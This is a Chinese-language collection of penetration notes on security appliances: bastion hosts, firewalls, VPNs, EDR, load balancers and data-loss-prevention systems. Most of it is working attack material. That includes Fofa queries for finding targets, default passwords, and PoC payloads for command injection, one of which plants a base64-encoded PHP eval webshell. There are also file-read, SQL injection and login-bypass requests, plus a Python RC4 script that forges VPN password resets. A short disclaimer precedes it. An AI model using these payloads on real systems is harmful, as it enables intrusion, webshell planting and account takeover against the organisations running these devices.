学习笔记-常见安全设备渗透方法
SecDevice - Exploits
免责声明
本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.
大纲
身份与访问控制
堡垒机
齐治堡垒机
Fofa: app="齐治科技-堡垒机"
-
默认口令
- shterm/shterm
-
齐治堡垒机 ShtermClient-2.1.1 命令执行漏洞
- 齐治堡垒机ShtermClient-2.1.1命令执行漏洞(CNVD-2019-09593)分析
http://10.20.10.11/listener/cluster_manage.php https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS} /var/www/shterm/resources/qrcode/lbj77.php 密码10086
- 齐治堡垒机ShtermClient-2.1.1命令执行漏洞(CNVD-2019-09593)分析
-
CNVD-2019-20835 齐治堡垒机前台远程命令执行漏洞
-
CNVD-2019-17294 齐治堡垒机后台存在命令执行漏洞
-
远程代码执行
- POC | Payload | exp
POST /shterm/listener/tui_update.php a=["t';import os;os.popen('whoami')#"]
- POC | Payload | exp
-
任意用户登录漏洞
- POC | Payload | exp
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
- POC | Payload | exp
H3C SecParh
Fofa: app="H3C-SecPath-运维审计系统" && body="2018"
- get_detail_view.php 任意用户登录漏洞
- POC | Payload | exp
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
- POC | Payload | exp
teleport 开源堡垒机
fofa: app="TELEPORT堡垒机"
-
相关文章
-
任意用户登录漏洞
- POC | Payload | exp
-
后台文件读取
- POC | Payload | exp
/audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0
- POC | Payload | exp
IMC
H3C IMC智能管理中心
- 远程代码执行
网络检测与响应
蜜罐
相关文章
相关工具
- BeichenDream/WhetherMysqlSham - 检测目标 Mysql 数据库是不是蜜罐,获取目标数据库详细信息
- Monyer/antiHoneypot - 一个拦截蜜罐 XSSI 的 Chrome 扩展
- NS-Sp4ce/MoAn_Honey_Pot_Urls - X安蜜罐用的一些存在JSonp劫持的API
从蓝队溯源角度出发
- 分析样本
- PC 名称
- 语言
- 常用函数、方法
- 注释习惯、变量名习惯
- 前端漏洞反制
- 浏览器记录、书签、cookie 等
- 验证码、手机号、邮箱
- 攻击时间段
- 后渗透反制
- 钓鱼文件
- ntlm中继
- Rogue MySql Server
从红队角度出发
- 前台
- 不支持正常浏览器,仅老版 IE
- 仅支持老版本 flash
- 不正常的 JS 文件,js 混淆
- 仅 json 文件, 内含指纹
- XSS、JSONP
- 大量网络请求
- 同站同 CMS 不同页面不同时间、CMS 版本
- 任意口令登录?
- 要求实名认证、或手机号注册
- 后渗透
- 第二次登录后发现 history 记录全部清空
- 开放了大量端口
- docker 容器且无正常业务数据
- 例如 cat /proc/meminfo 这个命令无论执行多少次得到的内容都是不变的,而这真实的系统中是不可能的。
IDS
相关文章
绿盟 UTS 综合威胁探针
- 管理员任意登录
- POC | Payload | exp
防火墙
Cisco ASA
-
CVE-2018-0296 Cisco ASA Directory Traversal
- POC | Payload | exp
-
CVE-2020-3452
- POC | Payload | exp
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
- POC | Payload | exp
网康下一代防火墙
fofa: app="网康科技-下一代防火墙"
- 网康下一代防火墙 RCE
- POC | Payload | exp
POST /directdata/direct/router HTTP/1.1 {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test_test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
访问:https://x.x.x.x/test_test.txt
- POC | Payload | exp
启明星辰 天清汉马USG防火墙
-
弱口令
账号:useradmin 密码:venus.user
-
逻辑缺陷漏洞
登陆后,后台可直接修改任意用户权限
佑友防火墙
-
默认账号密码
User: admin Pass: hicomadmin
-
后台命令执行漏洞
系统管理 --> 维护工具 --> Ping 127.0.0.1|cat /etc/passwd
zeroshell
- rce
- POC | Payload | exp
WAF
Sophos XG
- CVE-2020-12271 && CVE-2020-15504
绿盟 waf 封禁绕过s
- XFF 伪造字段地址为 127.0.0.1,导致 waf 上看不见攻击者地址
网关
上海格尔安全认证网关管理系统
网康 NS-ASG 安全网关
Fofa : 网康 NS-ASG 安全网关
- 任意文件读取漏洞
- POC | Payload | exp
/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd
- POC | Payload | exp
负载均衡
Citrix ADC
-
默认口令
nsroot/nsroot
-
CVE-2019-19781 Citrix Gateway/ADC 远程代码执行漏洞
-
相关文章
-
POC | Payload | exp
-
F5 BIG-IP
-
CVE-2020-5902 F5 BIG-IP 远程代码执行漏洞
-
CVE-2021-22986 F5 BIG-IP RCE
-
CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞
天融信 Top-app LB
-
SQL注入漏洞
- POC | Payload | exp
- 天融信Top-app LB负载均衡SQL注入漏洞
POST /acc/clsf/report/datasource.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22-- &o=r_Speed&gid=0&lmt=10&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=
- 天融信Top-app LB负载均衡SQL注入漏洞
- POC | Payload | exp
-
未授权
- POC | Payload | exp
- 天融信负载均衡TopApp-LB系统无需密码直接登录
登录框 ; ping xxx.dnslog.info; echo
- 天融信负载均衡TopApp-LB系统无需密码直接登录
- POC | Payload | exp
-
RCE
- POC | Payload | exp
- 天融信TopApp-LB负载均衡命令执行漏洞大量设备可被通杀
用户名随意 密码:;id
- 天融信TopApp-LB负载均衡命令执行漏洞大量设备可被通杀
- POC | Payload | exp
VPN
Fortigate SSL VPN
- CVE-2018-13379 Fortigate SSL VPN 密码读取
- CVE-2018-13382 Fortigate SSL VPN 任意密码重置
Palo_Alto SSL VPN
- CVE-2019-1579 Palo Alto GlobalProtect 远程代码执行漏洞
Pulse_Secure SSL VPN
-
CVE-2019-11510 Pulse Secure SSL VPN 任意文件读取漏洞
-
相关文章
-
POC | Payload | exp
-
-
CVE-2019-11539 Pulse Secure SSL VPN 远程代码执行漏洞
深信服 VPN
-
常见密码
admin/sangfor@123 sangfor/sangfor test/test test1/123456b
-
口令爆破
- POC | Payload | exp
- https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=20633
用户登录,若多次尝试登录失败会要求输入验证码,若输入错误的验证码,会提示“校验码错误或校验码已过期”;修改登录请求的数据包,清空cookie和验证码字段的值即可绕过验证码,此时提示“用户名或密码错误”。 /por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd=
- https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=20633
- POC | Payload | exp
-
短信绕过
- POC | Payload | exp
POST https://路径/por/changetelnum.csp?apiversion=1 newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1
- POC | Payload | exp
-
任意密码重置
- POC | Payload | exp
某VPN加密算法使用了默认的key,攻击者构利用key构造重置密码数据包从而修改任意用户的密码 利用:需要登录账号 M7.6.6R1版本key为20181118 M7.6.1key为20100720 POST /por/changepwd.csp sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN(脚本计算后结果)
from Crypto.Cipher import ARC4 from binascii import a2b_hex def myRC4(data, key): rc41= ARC4.new(key) encrypted =rc41.encrypt(data) return encrypted. encode('hex') def rc4_decrpt_hex(data, key): rc41= ARC4. new(key) return rc41. decrypt(a2b_hex(data)) key= '20100720' data = r',username-TARGET_USERNAME, ip-127.0.0.1,grpid-1, pripsw-suiyi , newpsw=TARGET PASSWORD,' print myRC4(data, key)
- POC | Payload | exp
-
RCE
-
影响版本
- SSLM7.6.6(20181120)
- SSLM7.6.6R1(20181225)
-
相关文章
-
POC | Payload | exp
https://x.com/por/checkurl.csp?url=http://127.0.0.1;sleep${IFS}5;&retry=0&timeout=1
-
锐捷 SSL VPN
- 锐捷 SSL VPN 越权访问漏洞
- FOFA: icon_hash="884334722" || title="Ruijie SSL VPN"
- 相关文章
- POC | Payload | exp
UserName 参数为已知用户名GET /cgi-bin/main.cgi?oper=getrsc HTTP/1.1 Cookie: UserName=admin; SessionId=1; FirstVist=1; Skin=1; tunnel=1
威胁感知
Sophos UTM
- CVE-2020-25223-Sophos UTM WebAdmin 远程命令执行漏洞
终端响应与检测
相关文章
杀软
利用杀毒软件删除任意文件
白名单信任文件
- 相关文章
EDR
深信服 EDR
-
相关文章
-
2020.08命令执行
- 相关文章
- POC | Payload | exp
-
2020.09命令执行
- POC | Payload | exp
POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 {"params":"w=123\"'1234123'\"|命令"}
- POC | Payload | exp
-
后台任意用户登陆
- POC | Payload | exp
xxx.xxx.xxx.xxx/ui/login.php?user=admin
- POC | Payload | exp
360天擎
Fofa: title="360天擎"
-
前台SQL注入
- POC | Payload | exp
/api/dp/rptsvcsyncpoint?ccid=1
- POC | Payload | exp
-
数据库信息泄露漏洞
- POC | Payload | exp
http://x.x.x.x/api/dbstat/gettablessize
- POC | Payload | exp
金山 V8 终端安全系统
Fofa: title="在线安装-V8+终端安全系统Web控制台"
-
任意文件读取漏洞
- POC | Payload | exp
/htmltopdf/downfile.php?filename=downfile.php
- POC | Payload | exp
-
pdf_maker.php 命令执行漏洞
-
相关文章
-
POC | Payload | exp
POST /inter/pdf_maker.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx
-
数据防泄漏系统
天融信数据防泄漏系统
- 越权修改管理员密码
无需登录权限,由于修改密码处未校验原密码,且 /?module=auth_user&action=mod_edit_pwd 接口未授权访问,造成直接修改任意用户密码。 默认 superman 账户 uid 为 1。 POST /?module=auth_user&action=mod_edit_pwd Cookie: username=superman; uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1
点击关注,共同学习!
安全狗的自我修养